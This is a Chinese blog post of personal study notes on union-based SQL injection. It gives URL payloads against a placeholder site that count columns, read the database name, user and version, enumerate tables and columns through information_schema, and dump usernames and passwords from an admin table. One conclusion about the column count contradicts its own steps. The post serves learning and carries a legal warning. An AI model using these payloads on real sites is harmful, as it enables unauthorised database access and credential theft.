网络安全 sql 注入

最新推荐文章于 2024-06-06 10:59:56 发布
最新推荐文章于 2024-06-06 10:59:56 发布
阅读量707 收藏
点赞数 1
分类专栏: 网络安全 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/start_f_scratch/article/details/105406074
版权

未经允许万不可随意测试网站,请在法律的允许下使用,谨记谨记!

个人学习网络安全笔记及个人理解,如有问题请在评论区讨论 

网络安全网站:https://www.freebuf.com/

sql 注入:地址栏输入在数据库可以执行的语句,并进入数据库查到数据

(地址栏输入 空格转为字符问题  方法:/**/)

例:

ww.xxx.com?id=1 and 1=1 转 数据库sql 语句:select * from (表名) where id=1 and 1=1 

ww.xxx.com?id=123456 and 1=1 union select 1,2

转 数据库sql 语句:

select * from  (表名) where id='123456' and 1=1 union select 1,2 (mysql)

select * from  (表名) where id='123456' and 1=1 union select 1,2 from dual;(Oracle)

名词解释:union 用于合并两个或多个 SELECT 语句的结果集。

执行结果 :

12
123456user

 

1.查询此表里有几个字段(假设一共有2个字段)

ww.xxx.com?id=123456 order by 1 (正常)

ww.xxx.com?id=123456 order by 2 (正常)

ww.xxx.com?id=123456 order by 1,2 (正常)

ww.xxx.com?id=123456 order by 3 (失败)

结论:此表有3个字段

2.ww.xxx.com?id=123456 and 1=2 union select 1,database() 

:1=2 错误语法 引起数据库语法出错 不用查询前面的 防止union前面select 查询结果影响后面结果

:select 1,database() 查询前面select 使用的数据库

:select 1,user()  查询当前登录的用户 

:select 1,version() 数据库版本号

3.查询当前mysql有哪些数据库(默认数据库 mysql)

ww.xxx.com?id=1 and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata)

mysql 默认有一个information_schema表

关于此数据库的详细解释 =》https://zhuanlan.zhihu.com/p/45287222

:information_schema:定义数据库名或表名,列的数据类型,或访问权限等。给数据库定义规范

:schemata:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

:schema_name:存储所有数据库的名字

:group_concat :将相同的行组合  即:schema_name相同的行组合在一起

4.查询指定数据库里有哪些表

ww.xxx.com?id=1 and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema='xxx'

:tables :提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。

5.查询当前数据库指定表里有哪些字段

ww.xxx.com?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name= 'admin'

6.查询指定表里指定字段有哪些内容

ww.xxx.com?id=1 and 1=2 union select 1,group_concat(username,',',password) from admin

start_f_scratch
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全---sql注入、绕过
bffanfan的博客
01-04 1405
1.sql注入 概念:将恶意的sql查询或者添加语句插入到输入的参数中,再在后台sql服务器解析形成攻击 原理:程序员没有遵循代码与数据分离原则,是用户数据作为代码执行 注释:#或者–空格是单行注释,/**/是内联注释 条件:用户可以控制数据的输入 ​ 原本要运行的代码拼接了用户的输入并运行 sql注入产生原因:web服务器向数据访问层发起sql请求,权限验证通过就执行sql语句。网站内部直接发送的sql语句请求一般不会有危险。但实际情况是需要结合用户输入的数据动态构造sql语句,如果用户输入的数据构造称恶
网络应用层安全之SQL注入
Limonor的博客
05-04 637
网络应用层安全之SQL注入 注入攻击,就是数据与代码没有分离产生的结果,计算机或服务器把用户输入的数据当做代码执行,其中有两个关键条件:①用户能够控制输入,②代码进行了拼接。 SQL注入是发生在 Web 程序中数据库层的安全漏洞,是网站最常见最简单的漏洞。网站考虑地再详细也会被黑客们抓到漏洞和破绽,SQL注入利用程序对输入数据不会判断和处理进行恶意攻击,使用具有特定意义的SQL 语句执行非法操作。 简言之,SQL 注入就是在用户输入的字符串中加入 SQL 语句,如果程序没有对输入进行处理,那么这些注入
xxx@xxx.com
09-09
lorem ipsm dolor sit amet
nginx对于XXX.com和XXX.com/index给映射到www.xxx.com的方式
fhb19870610的专栏
05-15 36万+
location / {             root    C:/website;             index   index.html index.htm index.php;             include C:/website/.htaccess; if ($host !~ "www.xincanzs.com") { rewrite
HTML学生个人网站作业设计:HTML做一个公司官网首页页面(纯html代码)
最新发布
qq_365392777
06-06 533
🎉精彩专栏推荐 💭文末获取联系 ✍️ 作者简介: 一个热爱把逻辑思维转变为代码的技术博主 💂 作者主页: 【主页——🚀获取更多优质源码】 🎓 web前端期末大作业: 【📚毕设项目精品实战案例 (1000套) 】 🧡 程序员有趣的告白方式:【💌HTML七夕情人节表白网页制作 (110套) 】 🌎超炫酷的Echarts大屏可视化源码:【🔰 Echarts大屏展示大数据平台可视化(150套) 】 🔖 HTML+CSS+JS实例代码: 【🗂️HTML+CSS+JS实例代码 (炫酷特效网页代码) 继续更新
xxx.com和www.xxx.com的区别
weixin_42613703的博客
12-22 72万+
XXX.com 是主域名! WWW.xxx.com 一般是域名的主页! 在很多情况下,会配置成一样!!! 也有可能,主域名不配置到具体的IP,可能无法解析。。 C:\Windows\system32>nslookup baidu.com 服务器: UnKnown Address: 61.128.114.133 非权威应答: 名称: baidu.com Addresses: 22...
http://www.xxx.com/ skipped. Content of size 67099 was truncated to 59363
热门推荐
aa346359669的博客
01-07 138万+
如果提示http://www.xxx.com/ skipped. Content of size 67099 was truncated to 59363 在nutch-site.xml中添加: [code="java"] parser.skip.truncated false [/code] 这是因为网站的页面内容采用truncate的方式分段返回,而nutch...
site:xxx.com和site:www.xxx.com的区别
python二级题库
03-21 6万+
 site:xxx.com和site:www.xxx.com的区别很多seo界的朋友都有这个疑问,就是在site:xxx.com和site:www.xxx.com的时候的结果不同,有的时候可能数量会差出很多。      这个问题如果仔细看过google的网站管理员的介绍的话会有所了解的,但是并不是非常的明显,而是用了另外一种表达方式:网站域名xxx.com和www.xxx.com这两种
网络安全初探SQL注入漏洞
07-02
网络安全领域,SQL注入漏洞是一种常见的安全威胁,尤其在基于Web的应用程序中。本文将深入探讨SQL注入漏洞的原理、危害、以及如何防范这一问题。 SQL(Structured Query Language)是用于管理和处理关系数据库的...
网络安全SQL注入讲解.pptx
03-29
某知名安全专家sql注入攻防实战PPT. 你将收获sql注入攻防技术,以及可参考的专家级精美ppt模板.
网络安全技术13SQL注入.pptx
11-12
网络安全技术之SQL注入 SQL注入是一种常见的网络攻击手段,它通过在Web应用程序中插入恶意的SQL代码来攻击数据库,从而获取敏感信息或控制数据库。本文将对SQL注入进行详细的介绍,包括其概念、类型、攻击方法、...
SeDiv 52xx_/www.52xx.com/_://www.52xx.com_xx27_//www.52xx.com_ww
10-02
SeDiv 5.2.xx Seagate HDD Utility
wk2xxx_spi_v1.120160715.rar_444XXXcOm_444wk. com_linux wk2124_wk
07-15
wk2124_spi_v1.1_linux驱动
网络安全 sql注入工具sqlmap使用
01-13
网络安全sql注入工具sqlmap使用 Sqlmap是当前最流行的sql注入工具之一,广泛应用于网络安全领域,特别是在渗透测试和漏洞扫描领域。Sqlmap可以自动检测和利用SQL注入漏洞,获取数据库敏感信息,包括数据库结构、...
中国网络安全联盟SQL注入检测 v1.0
11-05
SQL注入是一种常见的网络安全威胁,它利用了应用程序对用户输入数据的不当处理,使得攻击者能够向数据库发送恶意SQL命令。中国网络安全联盟SQL注入检测工具v1.0是专为此类风险设计的防御软件,旨在保护系统免受此类...
无法解决此远程名称:“www.xxxxxx.com“的解决方法
Ling_smile的博客
01-08 83万+
分析原因:从防火墙屏蔽端口到支付宝签约id是否过期,最后才找出原因,原来我的服务器DNS解析错误,无法访问到调用的远程服务器。原因是:服务器不能上外网。     解决办法如下:         在服务器上执行:开始|运行|cmd  ping www.***com  //注:ping 后面的地址是你调用的远程服务器的域名。         如果可以ping通,说明DNS解析正确。      ...
java.lang.IllegalStateException: No instances available for localhost
chenglc1612的博客
11-30 2686
java.lang.IllegalStateException: No instances available for localhost 在SpringCloud的项目中,我们使用了自动配置的OAuth2RestTemplate,RestTemplate,但是在使用这些restTemplate的时候,url必须是服务的名称,如果要调用真实的域名或...
iOS安全系列之二:HTTPS进阶
宋波的专栏
09-25 1419
原文地址:iOS安全系列之二:HTTPS进阶 上一篇《iOS安全系列之一:HTTPS》被CocoaChina转载,还顺便上了下头条: 打造安全的App!iOS安全系列之 HTTPS,但那篇文章只是介绍了比较偏应用的初级知识,对于想要深入了解HTTPS的同学来说是远远不够的,刚好本人最近工作上也遇到并解决了一些HTTPS相关的问题,以此为契机,决定写这篇更深入介绍HTTPS的文章。
wwwxxx域名选择(www.xxx.com或者.cn)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-26 56万+
域名就是网站的网址,就跟家庭住址一样,那么域名就是我们网站的地址,我们使用方便记忆的域名(字母/数字+.COM等域名后缀:www.xxx.com)。 按所属机构分常见后缀形式: COM:商业性的机构/公司/个人,因为COM这个后缀公信度高,所以用得比较多 ORG :非盈利的组织、团体 GOV:政府部门 NET:从事Internet相关的的机构或公司 EDU:教育机构 .互联网通用顶级域之一,主要供教育机构,如大学等院校使用,实际使用的教育机构大部分位于美国。 注意:还有很多,但是不常见,就先不
网络安全sql注入数字
05-08
网络安全中的SQL注入攻击指的是攻击者利用输入的数据来修改或者破坏数据库的行为。攻击者可以通过在输入中添加特殊字符,从而绕过应用程序的数据验证,进而执行恶意代码。数字SQL注入是一种特定类型的SQL注入攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值